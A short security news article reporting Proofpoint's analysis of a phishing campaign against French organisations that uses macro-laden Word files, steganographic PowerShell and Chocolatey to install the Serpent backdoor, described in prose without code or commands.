Researchers have discovered a new targeted email campaign attacking French construction, real estate, and government entities. It uses the Chocolatey Windows package manager to install the Serpent backdoor on compromised devices. Based on the techniques and victimology patterns discovered, enterprise security firm Proofpoint linked the attacks to a potential advanced threat actor. The campaign’s prime objective is unknown at this time.
“The threat actor attempted to install a backdoor on a potential victim’s device, which could enable remote administration, command and control (C2), data theft, or deliver other additional payloads,” Proofpoint researchers said.
A resume-themed subject line is used in the phishing bait that starts the infection process, with the attached macro-embedded Microsoft Word document posing as information on the European Union’s General Data Protection Regulation (GDPR). Enabling the macros causes it to run, which gets a safe image file from a remote site that includes a Base64-encoded PowerShell script hidden behind steganography, a seldom-used way of hiding malicious code within an image or audio to avoid detection.
The PowerShell script is used to deploy the Chocolatey utility on the Windows device, which is then used for installing the Python package installer pip. The latter serves as a conduit for the PySocks proxy library to be installed. The same PowerShell script also downloads another image file from the same remote server. It contains the disguised Python backdoor called Serpent, which can execute instructions sent from the C2 server.
In addition to steganography, using well-known technologies like Chocolatey as an initial payload for further deployment of basic Python packages is an attempt to avoid being detected as a threat, disclosed Proofpoint. The attacks haven’t been linked to any previously identifiable actors or groups, but they’re thought to be the work of a skilled hacking workforce.